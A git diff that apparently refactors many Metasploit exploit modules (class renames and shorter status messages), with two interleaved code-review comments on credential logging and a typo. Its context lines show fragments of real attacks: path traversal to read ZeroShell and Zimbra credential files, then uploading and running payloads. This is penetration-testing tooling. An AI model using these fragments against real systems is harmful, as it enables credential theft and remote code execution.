print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets', 'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename) diff --git a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb index d51f8957e1..bcf004dac6 100644 
--- a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body =~ /#{php_page_name}/ - print_good("#{peer} - Payload uploaded as #{php_page_name}") + print_good("Payload uploaded as #{php_page_name}") register_files_for_cleanup(php_page_name) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Server did not answer") end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) }, 5 diff --git a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb index 5643f7fef8..4e73bdf79d 100644 --- a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote # forward to profile.php or other page? if res && res.redirect? && res.redirection location = res.redirection - print_status("#{peer} - Following redirect to #{location}") + print_status("Following redirect to #{location}") res = send_request_cgi( 'uri' => location, 'method' => 'GET', 
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(nonce, nil, nil, 'form-data; name="wp_nonce"') post_data = data.to_s - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_ajax, @@ -117,29 +117,29 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to login as #{user}") + print_status("Trying to login as #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as #{user}") + print_error("Unable to login as #{user}") return end - print_status("#{peer} - Trying to get nonce") + print_status("Trying to get nonce") nonce = get_nonce(cookie) if nonce.nil? - print_error("#{peer} - Can not get nonce after login") + print_error("Can not get nonce after login") return end - print_status("#{peer} - Got nonce #{nonce}") + print_status("Got nonce #{nonce}") - print_status("#{peer} - Trying to upload payload") + print_status("Trying to upload payload") file_path = upload_file(cookie, nonce) if file_path.nil? - print_error("#{peer} - Error uploading file") + print_error("Error uploading file") return end - print_status("#{peer} - Calling uploaded file #{file_path}") + print_status("Calling uploaded file #{file_path}") send_request_cgi( 'uri' => file_path, 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb index e48bbf5a9d..4e4ab2070c 100644 --- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb +++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress 
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_uri = normalize_uri(target_uri.path, wp_content_dir, 'uploads', 'wysija', 'themes', theme_name, payload_name) - print_status("#{peer} - Uploading payload to #{payload_uri}") + print_status("Uploading payload to #{payload_uri}") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_post, @@ -108,9 +108,9 @@ class Metasploit3 < Msf::Exploit::Remote # the theme folder (manual cleanup) register_files_for_cleanup('style.css', payload_name) - print_warning("#{peer} - The theme folder #{theme_name} can not be removed. Please delete it manually.") + print_warning("The theme folder #{theme_name} can not be removed. Please delete it manually.") - print_status("#{peer} - Executing payload #{payload_uri}") + print_status("Executing payload #{payload_uri}") send_request_cgi( 'uri' => payload_uri, 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/xoda_file_upload.rb b/modules/exploits/unix/webapp/xoda_file_upload.rb index 410ba14ceb..5877144ba3 100644 --- a/modules/exploits/unix/webapp/xoda_file_upload.rb +++ b/modules/exploits/unix/webapp/xoda_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data << "\r\n" post_data << "--#{boundary}--\r\n" - print_status("#{peer} - Sending PHP payload (#{@payload_name})") + print_status("Sending PHP payload (#{@payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}?upload", 
@@ -110,11 +110,11 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 302 - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{@payload_name})") + print_status("Executing PHP payload (#{@payload_name})") # Execute our payload res = send_request_cgi({ @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/unix/webapp/zeroshell_exec.rb b/modules/exploits/unix/webapp/zeroshell_exec.rb index 2fb30b494a..2e6345440a 100644 --- a/modules/exploits/unix/webapp/zeroshell_exec.rb +++ b/modules/exploits/unix/webapp/zeroshell_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect ZeroShell") + print_status("Trying to detect ZeroShell") res = send_request_cgi({ 'method' => 'GET', @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote # Retrieve admin password using unauthenticated LFI def password rootpw = "../../../var/register/system/ldap/rootpw" - print_status("#{peer} - Retrieving cleartext admin password") + print_status("Retrieving cleartext admin password") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "cgi-bin", "kerbynet"), 
@@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body !~ /not found/ res.body =~ /^(.*)$/ pass = $1 - print_status("#{peer} - Password retrieved [ #{pass} ]") + print_status("Password retrieved [ #{pass} ]") return pass else return nil @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote # Login using the retrieved password and grab the session key from the response body. def login(admin_password) - print_status("#{peer} - Log in and retrieving session key") + print_status("Log in and retrieving session key") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "cgi-bin", "kerbynet"), @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /STk=([a-zA-Z0-9]+)&Action/ sessionkey = $1 - print_status("#{peer} - Session key retrieved [ #{sessionkey} ]") + print_status("Session key retrieved [ #{sessionkey} ]") return sessionkey else fail_with(Failure::Unknown, "#{peer} - Retrieving session key failed!") diff --git a/modules/exploits/unix/webapp/zimbra_lfi.rb b/modules/exploits/unix/webapp/zimbra_lfi.rb index c126de0f39..c11f84545f 100644 --- a/modules/exploits/unix/webapp/zimbra_lfi.rb +++ b/modules/exploits/unix/webapp/zimbra_lfi.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting login credentials...") + print_status("Getting login credentials...") res = send_traversal_query(traversal_path("conf/localconfig.xml")) unless res and res.code == 200 
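Review bot: `print_status("Password retrieved [ #{pass} ]")` in the `@@ -91,7 +91,7 @@` hunk of zeroshell_exec.rb and `print_status("Session key retrieved [ #{sessionkey} ]")` in `@@ -114,7 +114,7 @@` write a recovered admin password and a live session key to default console output. From there they end up in scrollback and in any spooled or shared log. Keeping the secret out of the default message, `print_status("Password retrieved")` with the value behind `vprint_status`, limits where it gets copied; the value itself is better held in the engagement's credential store than in log text. zpanel_username_exec.rb (`@@ -138,18 +138,18 @@`) does the same with `datastore['PASSWORD']` in its `Logged in as` line.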
@@ -115,8 +115,8 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to get login credentials") end - print_good("#{peer} - Got login credentials!") - print_status("#{peer} - Getting auth token...") + print_good("Got login credentials!") + print_status("Getting auth token...") soap_req = build_soap_req(zimbra_user, zimbra_pass) #lets get our hands foamy @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote end @cookie = "ZM_ADMIN_AUTH_TOKEN=#{auth_token}" - print_good("#{peer} - Got auth token!") + print_good("Got auth token!") #the initial POC for this vuln shows user creation with admin rights for the web interface, thats cool but a shell is even cooler #the web interface has a function to upload the latest version of the desktop client via /service/extension/clientUploader/upload/ @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_elf = generate_payload_exe #upload payload - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = upload_file(payload_name, payload_elf) unless res and res.code == 200 @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote end #upload jsp stager - print_status("#{peer} - Uploading jsp stager") + print_status("Uploading jsp stager") res = upload_file(stager_name, stager) unless res and res.code == 200 @@ -176,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote "../jetty/webapps/zimbra/downloads/#{payload_name}" ) - print_status("#{peer} - Executing payload on /downloads/#{stager_name}") + print_status("Executing payload on /downloads/#{stager_name}") res = send_request_cgi({ 'uri' => normalize_uri("downloads", stager_name), diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb index 5add6e428a..e1ff8e7aa0 100644 --- a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "action=login&view=version&username=#{user}&password=#{pass}" # login and retrieve software version - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 if res.body =~ /<title>ZM - Login<\/title>/ - vprint_error("#{peer} - Service found, but authentication failed") + vprint_error("Service found, but authentication failed") return Exploit::CheckCode::Detected elsif res.body =~ /v1.2(4\.\d+|5\.0)/ return Exploit::CheckCode::Appears @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote end end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote command = Rex::Text.uri_encode(payload.encoded) # login - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', @@ -121,10 +121,10 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Failure::Unreachable, "#{peer} - Connection failed") end - print_good("#{peer} - Authenticated successfully") + print_good("Authenticated successfully") # send payload - print_status("#{peer} - Sending payload (#{command.length} bytes)") + print_status("Sending payload (#{command.length} bytes)") begin res = send_request_cgi({ 'method' => 'POST', 
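Review bot: The `rescue` line kept as context in the `@@ -90,7 +90,7 @@` hunk of zoneminder_packagecontrol_exec.rb names `::Rex::ConnectionTimeoutp`, with a trailing `p`, where the matching `rescue` in the `@@ -121,10 +121,10 @@` hunk names `::Rex::ConnectionTimeout`. Ruby resolves the constants in a rescue list only when an exception reaches it, so a connection timeout here would most likely surface as a NameError instead of returning `Exploit::CheckCode::Unknown`. The line should read `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout`. The method this belongs to starts outside the hunk.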
@@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote 'cookie' => "#{cookie}" }) if res and res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") end diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index 5a398002a8..d087d53acc 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_raw({'uri' => normalize_uri(target_uri.path)}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -138,18 +138,18 @@ class Metasploit3 < Msf::Exploit::Remote base = target_uri.path token, sid = get_csfr_info(base) - vprint_status("#{peer} - Token=#{token}, SID=#{sid}") + vprint_status("Token=#{token}, SID=#{sid}") user_salt_cookie = login(base, token, sid) - print_good("#{peer} - Logged in as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_good("Logged in as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") vars = {'module'=>'htpasswd', 'selected'=>'Selected', 'path'=>'/'} cookie = "#{sid}; #{user_salt_cookie}" token = get_csfr_info(base, '', cookie, vars)[0] - vprint_status("#{peer} - Token=#{token}, SID=#{sid}") + vprint_status("Token=#{token}, SID=#{sid}") - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") exec(base, token, sid, user_salt_cookie) end diff --git a/modules/exploits/unix/x11/x11_keyboard_exec.rb b/modules/exploits/unix/x11/x11_keyboard_exec.rb index 00ba8cad4b..3b07a8c264 100644 
--- a/modules/exploits/unix/x11/x11_keyboard_exec.rb +++ b/modules/exploits/unix/x11/x11_keyboard_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb index efed29d6fa..3e925831b0 100644 --- a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb +++ b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/antivirus/ams_xfr.rb b/modules/exploits/windows/antivirus/ams_xfr.rb index 7088c01e04..9496760df7 100644 --- a/modules/exploits/windows/antivirus/ams_xfr.rb +++ b/modules/exploits/windows/antivirus/ams_xfr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb index b85a120157..1f62f84c1e 100644 --- a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb +++ b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include REXML @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending payload") + print_status("Sending payload") # Execute the cmdstager, max length of the commands is ~3950 execute_cmdstager({:flavor => :vbs, :linemax => 3950}) end 
diff --git a/modules/exploits/windows/antivirus/symantec_iao.rb b/modules/exploits/windows/antivirus/symantec_iao.rb index 48b9a23fb3..e1ae91de8e 100644 --- a/modules/exploits/windows/antivirus/symantec_iao.rb +++ b/modules/exploits/windows/antivirus/symantec_iao.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/antivirus/symantec_rtvscan.rb b/modules/exploits/windows/antivirus/symantec_rtvscan.rb index d766eb6294..1e464e7b5d 100644 --- a/modules/exploits/windows/antivirus/symantec_rtvscan.rb +++ b/modules/exploits/windows/antivirus/symantec_rtvscan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb index d215a55d1a..1100693c5a 100644 --- a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb +++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -229,21 +229,21 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Leaking the JBoss deployment directory...") + print_status("Leaking the JBoss deployment directory...") jboss_path =jboss_deploy_path if jboss_path.nil? fail_with(Failure::Unknown, "#{peer} - Failed to disclose the JBoss deployment directory") end - print_status("#{peer} - Building WAR payload...") + print_status("Building WAR payload...") app_name = Rex::Text.rand_text_alpha(4 + rand(4)) war_name = "#{app_name}.war" war = payload.encoded_war({ :app_name => app_name }).to_s deploy_dir = "..#{jboss_path}" - print_status("#{peer} - Uploading WAR payload...") + print_status("Uploading WAR payload...") res = upload_war(war_name, war, deploy_dir) diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb index 96d629dcf2..78276f632f 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb index 026513e734..f85e5a0d20 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb index ef09da8928..aab4bbef64 100644 
--- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/arkeia/type77.rb b/modules/exploits/windows/arkeia/type77.rb index d1c08fd8c3..c4ef38be85 100644 --- a/modules/exploits/windows/arkeia/type77.rb +++ b/modules/exploits/windows/arkeia/type77.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Arkeia diff --git a/modules/exploits/windows/backdoor/energizer_duo_payload.rb b/modules/exploits/windows/backdoor/energizer_duo_payload.rb index a6eb07f123..6b1392a2b6 100644 --- a/modules/exploits/windows/backdoor/energizer_duo_payload.rb +++ b/modules/exploits/windows/backdoor/energizer_duo_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/backupexec/name_service.rb b/modules/exploits/windows/backupexec/name_service.rb index 8670ef8c98..f67e8af3b3 100644 --- a/modules/exploits/windows/backupexec/name_service.rb +++ b/modules/exploits/windows/backupexec/name_service.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/backupexec/remote_agent.rb b/modules/exploits/windows/backupexec/remote_agent.rb index 13431a8ea1..85ca160d70 100644 --- a/modules/exploits/windows/backupexec/remote_agent.rb +++ b/modules/exploits/windows/backupexec/remote_agent.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::NDMP diff --git a/modules/exploits/windows/brightstor/ca_arcserve_342.rb b/modules/exploits/windows/brightstor/ca_arcserve_342.rb index 0ac6087379..9c34ac5621 100644 --- a/modules/exploits/windows/brightstor/ca_arcserve_342.rb +++ b/modules/exploits/windows/brightstor/ca_arcserve_342.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/discovery_tcp.rb b/modules/exploits/windows/brightstor/discovery_tcp.rb index 8145935ad9..c2c7d89872 100644 --- a/modules/exploits/windows/brightstor/discovery_tcp.rb +++ b/modules/exploits/windows/brightstor/discovery_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/discovery_udp.rb b/modules/exploits/windows/brightstor/discovery_udp.rb index bfe484f24f..1a8a8d5885 100644 --- a/modules/exploits/windows/brightstor/discovery_udp.rb +++ b/modules/exploits/windows/brightstor/discovery_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/etrust_itm_alert.rb b/modules/exploits/windows/brightstor/etrust_itm_alert.rb index 61ae466927..5947954bba 100644 --- a/modules/exploits/windows/brightstor/etrust_itm_alert.rb +++ b/modules/exploits/windows/brightstor/etrust_itm_alert.rb 
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::DCERPC
diff --git a/modules/exploits/windows/brightstor/hsmserver.rb b/modules/exploits/windows/brightstor/hsmserver.rb
index ade7cf8ecf..a23793e2e1 100644
--- a/modules/exploits/windows/brightstor/hsmserver.rb
+++ b/modules/exploits/windows/brightstor/hsmserver.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/brightstor/lgserver.rb b/modules/exploits/windows/brightstor/lgserver.rb
index d439f85cc8..11017fc1d8 100644
--- a/modules/exploits/windows/brightstor/lgserver.rb
+++ b/modules/exploits/windows/brightstor/lgserver.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/brightstor/lgserver_multi.rb b/modules/exploits/windows/brightstor/lgserver_multi.rb
index 6f6bda88cd..6aadbd1579 100644
--- a/modules/exploits/windows/brightstor/lgserver_multi.rb
+++ b/modules/exploits/windows/brightstor/lgserver_multi.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
diff --git a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb
index a54686a117..307a6d1eb0 100644
--- a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb
+++ b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb
index bbbd6376ee..9af29f1237 100644
--- a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb
+++ b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
diff --git a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb
index e12c6efa64..8f464578f1 100644
--- a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb
+++ b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/brightstor/license_gcr.rb b/modules/exploits/windows/brightstor/license_gcr.rb
index 53b03d3d27..2e6634ae61 100644
--- a/modules/exploits/windows/brightstor/license_gcr.rb
+++ b/modules/exploits/windows/brightstor/license_gcr.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb
index 6ea0c62537..f6a5fc70d8 100644
--- a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb
+++ b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::SunRPC
diff --git a/modules/exploits/windows/brightstor/message_engine.rb b/modules/exploits/windows/brightstor/message_engine.rb
index af04cc4bf8..5f8c82ef4f 100644
--- a/modules/exploits/windows/brightstor/message_engine.rb
+++ b/modules/exploits/windows/brightstor/message_engine.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::DCERPC
diff --git a/modules/exploits/windows/brightstor/message_engine_72.rb b/modules/exploits/windows/brightstor/message_engine_72.rb
index f4ca613159..377f36c163 100644
--- a/modules/exploits/windows/brightstor/message_engine_72.rb
+++ b/modules/exploits/windows/brightstor/message_engine_72.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
